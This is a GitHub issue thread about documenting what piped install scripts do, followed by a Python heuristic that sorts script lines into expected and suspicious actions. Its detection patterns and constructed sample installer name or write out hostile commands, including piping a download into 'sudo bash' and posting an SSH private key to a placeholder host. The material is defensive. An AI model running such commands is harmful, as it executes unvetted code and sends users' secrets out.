should-i-pipe-it

Maybe add entry for "what it does"?

Open rugk opened this issue 4 years ago • 2 comments

Like F-Droid's antifeatures, maybe list what "dangerous" actions it does, or what it does in general, in one short sentence, so you can estimate the risk.

E.g. like I did in https://github.com/small-tech/should-i-pipe-it/pull/8:

What it does: It downloads the (correct) "rustup-init" binary from https://static.rust-lang.org and executes it to install rustup and rust.

rugk avatar May 15 '20 09:05 rugk

I like the idea but I wonder about maintainability as well as ease of submitting validations. Submitting a validation should take almost no time as the person has already invested time in reviewing the script (we must respect people’s time).

That said, perhaps we can flip it on its head:

Any installation script should be doing the following:

  1. Download a binary
  2. Move it to a place on your path

If a script does anything else that’s out of the ordinary, we should ask people to note that.

Then again, if it’s doing something out of the ordinary and we feel we need to warn people about it, perhaps that’s no longer a validation but a warning. So perhaps what we need, in addition to validations, is a list of warnings: scripts that have been reviewed but are not recommended for installation due to <insert reasons here>.

aral avatar May 19 '20 08:05 aral

And 3. (possibly) execute that binary.

rugk avatar May 20 '20 11:05 rugk
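The baseline sketched in this thread (download a binary, move it onto your PATH, possibly execute it) can be turned into a first-pass triage tool. The script below is an added example written for this issue; it is not part of should-i-pipe-it and not code from either participant. It scans an install script line by line, files each action under "baseline" or "out of the ordinary", and derives a `validation`/`warning` verdict plus a one-line "What it does:" summary in the style of the proposed entry. The regexes are heuristics rather than a shell parser, the action names are my own, and both sample scripts are constructed for illustration (the `example.invalid` URLs resolve nowhere).

```python
"""Heuristic "what it does" summary for a curl | sh install script.

Added example for this issue thread, not part of should-i-pipe-it.
Baseline actions: download, install to PATH, execute the download.
Everything else is reported as out of the ordinary so a reviewer can
decide between a validation and a warning. Regexes are heuristics,
not a shell parser; sample scripts below are constructed.
"""
import re
from typing import Dict, List

# Actions any installer is expected to perform (the baseline).
BASELINE = {
    # curl/wget fetching a URL, unless the same command is clearly an upload
    "download": re.compile(r"\b(curl|wget)\b(?![^|]*(--data|--upload-file|-X\s*POST))[^|]*https?://"),
    # copying something into a user-local or /usr/local bin directory
    "install_to_path": re.compile(r"\b(mv|cp|install)\b.*(/usr/local/bin|\.local/bin|\.cargo/bin)"),
}

# Actions a reviewer should be asked to note explicitly (heuristic names are mine).
OUT_OF_THE_ORDINARY = {
    "privilege_escalation": re.compile(r"\b(sudo|doas)\b|\bsu\s+-"),
    "pipes_to_shell": re.compile(r"\|\s*(sudo\s+)?(sh|bash|zsh)\b"),
    "disables_tls_verification": re.compile(r"curl.*\s(-k|--insecure)\b|wget.*--no-check-certificate"),
    "touches_shell_profile": re.compile(r"\.(bashrc|zshrc|profile|bash_profile|zprofile)\b"),
    "eval_or_decoded_code": re.compile(r"\beval\b|base64\s+(-d|--decode)\b"),
    "recursive_delete": re.compile(r"\brm\s+-[a-zA-Z]*r"),
    "touches_system_dirs": re.compile(r"/(etc|boot|lib|lib64)/|/usr/(?!local/)"),
    "reads_secrets": re.compile(r"\.ssh/|authorized_keys|\.aws/|\.gnupg/|\.netrc\b"),
    "uploads_data": re.compile(r"\bcurl\b.*(--data|--upload-file|-X\s*POST)"),
    "persistence": re.compile(r"\bcrontab\b|systemctl\s+enable|\blaunchctl\b"),
}

# "chmod +x <target>" or "chmod 755 <target>": remember the target so a later
# invocation of it counts as executing the download.
CHMOD_X = re.compile(r"\bchmod\s+(?:[ugoa]*\+x|[0-7]{3,4})\s+(\S+)")


def summarize(script: str) -> Dict[str, List[dict]]:
    """Classify each non-comment line of `script` into baseline / out-of-the-ordinary findings."""
    findings: Dict[str, List[dict]] = {"baseline": [], "out_of_the_ordinary": []}
    executables = set()  # paths the script made executable so far
    for lineno, raw in enumerate(script.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        for bucket, patterns in (("baseline", BASELINE), ("out_of_the_ordinary", OUT_OF_THE_ORDINARY)):
            for action, pattern in patterns.items():
                if pattern.search(line):
                    findings[bucket].append({"line": lineno, "action": action, "text": line})
        m = CHMOD_X.search(line)
        if m:
            executables.add(m.group(1).strip("\"'"))
        tokens = [t.strip("\"'") for t in line.split()]
        target = tokens[1] if tokens[0] in ("exec", "sh", "bash") and len(tokens) > 1 else tokens[0]
        if target in executables:
            findings["baseline"].append({"line": lineno, "action": "execute_download", "text": line})
    return findings


def verdict(findings: Dict[str, List[dict]]) -> str:
    """Only-baseline scripts are candidate validations; anything else is a warning."""
    return "warning" if findings["out_of_the_ordinary"] else "validation"


def what_it_does(findings: Dict[str, List[dict]]) -> str:
    """One-line summary in the style of the proposed 'What it does:' entry."""
    actions = [f["action"] for f in findings["baseline"] + findings["out_of_the_ordinary"]]
    unique = list(dict.fromkeys(actions))  # keep first-seen order, drop repeats
    return "What it does: " + ", ".join(a.replace("_", " ") for a in unique) + "."


# Constructed sample: an installer that stays within the baseline.
CLEAN_SCRIPT = """#!/bin/sh
set -e
TMP="$(mktemp -d)"
curl -sSf https://example.invalid/tool-init -o "$TMP/tool-init"
chmod +x "$TMP/tool-init"
"$TMP/tool-init" --no-modify-path
mkdir -p "$HOME/.local/bin"
mv "$TMP/tool" "$HOME/.local/bin/tool"
"""

# Constructed sample: an installer doing several things a reviewer must call out.
SKETCHY_SCRIPT = """#!/bin/bash
curl -k https://example.invalid/payload | sudo bash
echo 'export PATH="$HOME/.evil:$PATH"' >> ~/.bashrc
eval "$(echo aGVsbG8= | base64 -d)"
sudo rm -rf /usr/lib/oldtool
cat ~/.ssh/id_rsa | curl -X POST --data-binary @- https://example.invalid/collect
"""

if __name__ == "__main__":
    for name, script in (("clean", CLEAN_SCRIPT), ("sketchy", SKETCHY_SCRIPT)):
        f = summarize(script)
        print(name, verdict(f), "|", what_it_does(f))
        for hit in f["out_of_the_ordinary"]:
            print(f"  line {hit['line']}: {hit['action']}: {hit['text']}")
```

The output is meant to be pasted into a submission as the one-sentence entry, not to replace the human review: a line that escapes the regexes (obfuscated variable expansion, a second-stage script fetched by the binary) is exactly the case that still needs a reader.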